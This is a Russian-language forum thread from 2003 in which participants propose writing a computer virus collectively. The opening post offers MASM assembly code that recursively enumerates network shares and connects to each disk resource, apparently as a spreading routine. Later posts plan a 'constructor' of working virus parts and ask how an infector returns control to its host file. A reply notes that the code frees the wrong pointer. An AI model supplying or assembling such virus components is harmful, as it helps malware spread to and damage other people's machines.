|
| Посл.отвђт | Сообщенiе |
|
|
Дата: Фев 10, 2003 02:13:06 Что-то как-то вяло пишем вирусы. Предлагаю написать вирус коллективно:) Может кому пригодится ф-ция для сканирования зашаренных ресурсов. EnumerateFunc proc uses ebx esi lpnr:dword LOCAL cEntries : dword LOCAL hEnum : dword LOCAL cbBuffer : dword or cEntries, -1 mov cbBuffer, 16384 xor ebx, ebx invoke WNetOpenEnumA, RESOURCE_GLOBALNET, ebx, ebx, lpnr, addr hEnum .if eax == ebx invoke GlobalAlloc, ebx, cbBuffer mov esi, eax invoke WNetEnumResourceA, hEnum, addr cEntries, esi, addr cbBuffer .while cEntries > ebx .if byte ptr (NETRESOURCEA ptr [esi]).dwUsage & RESOURCEUSAGE_CONTAINER invoke EnumerateFunc, esi .elseif dword ptr (NETRESOURCEA ptr [esi]).dwType == RESOURCETYPE_DISK invoke WNetAddConnection2A, esi, ebx, ebx, ebx .if eax == ebx invoke NeiDiskproc, (NETRESOURCEA ptr [esi]).lpRemoteName .else invoke WNetCancelConnection2A, (NETRESOURCEA ptr [esi]).lpRemoteName, ebx, ebx .endif .endif add esi, 20h dec cEntries .endw invoke GlobalFree, esi invoke WNetCloseEnum, hEnum .endif ret EnumerateFunc endp ;########################################### NeiDiskproc proc vakl:dword int 3 mov eax,vakl ret NeiDiskproc endp ;########################################### |
|
|
Дата: Фев 10, 2003 04:50:57 Может кому пригодится ф-ция ... А если GlobalAlloc завершиться неудачно? Чему будет равно ESI для GlobalFree если программа в цикле делает ADD ESI,20h? |
|
|
Дата: Фев 10, 2003 06:54:03 Imho WNetEnumResource, в отличии от NetShareEnum, не позволяет узнать о наличии скрытых ресурсов. |
|
|
Дата: Фев 10, 2003 10:57:44 Это было предложение, а не вопрос... |
|
|
Дата: Фев 10, 2003 11:28:40 Аноним Фев 10, 2003 10:57:44 Imho Enumerating Network Resources содержит правильную версию кода, правда на Си. |
|
|
Дата: Фев 10, 2003 12:11:25 А где взять на Дельфи ? |
|
|
Дата: Фев 10, 2003 12:48:04 Аноним Фев 10, 2003 12:11:25 А переписать с Си на Delphi трудно? В исходниках Delphi посмотрите "$(DelphiRoot)\Source\Rtl\Sys\SysUtils.pas" функция function GetUniversalName(const FileName: string): string; - имеет очень похожий кусок. |
|
|
Дата: Фев 10, 2003 13:14:12 А где взять на VB ? |
|
|
Дата: Фев 10, 2003 13:20:37 Давай колективно! Предложи план, по частям будем писать :) |
|
|
Дата: Фев 11, 2003 11:06:00 План простой, в раздел о вирусах накидать столько разных работающих частей вирусного кода чтобы из них можно было собрирать вирусы. Наподобие конструктора. Ваше слово .... |
|
|
Дата: Фев 11, 2003 11:46:51 [offtopic] Аноним Фев 11, 2003 11:06:00 чтобы из них можно было собрирать вирусы Вы не писаете в лифтах? [/offtopic] |
|
|
Дата: Фев 11, 2003 12:04:28 Ну, например, у меня есть кусок 1).Для поиска файла по всем ,и всяким, дискам, подключенным к машине. 2).Есть кусок для обхода всех дир на диске. Все на masm-e. С коментариями и доходчиво. 3).Есть кусок для определения ImageBase, для определения адреса нужной API. Правда незнаю как работать со старой точкой входа , тоесть как вернуть управление носителю. У Billy Belcebu не разобрался :( Объяснил бы кто эту тему а то стопорю. |
|
|
Дата: Фев 11, 2003 12:04:51 · Поправил: Aquila План простой, в раздел о вирусах накидать столько разных работающих частей вирусного кода чтобы из них можно было собрирать вирусы. Наподобие конструктора. Ваше слово .... Лучше напиши сам конструктор. |
|
|
Дата: Фев 11, 2003 12:19:12 Незнаю как вернуть управление носителю. У Billy Belcebu не разобрался :( Объяснил бы кто эту тему. |
|
|
Дата: Фев 11, 2003 13:12:30 К P2M Воину дзена Мужики! Ну так нельзя ! Ну надо ж "детям" объяснять как чего делать. А эти заявы типа "писаете в лифтах?" ну это ж не созидает, чел обидется и будет писать на своем VB. А потом все эти плаки "сцена пала, пала, нету сцены" так потому и нету что старые воины не соизволят спуститься с небес и поддержать ее родимую. Человек дело говорит, ну так поддержи если знаешь. Уже и так доигрались что в России дельфинов больше всех. Ну давай добивай одним в поле останешся ... |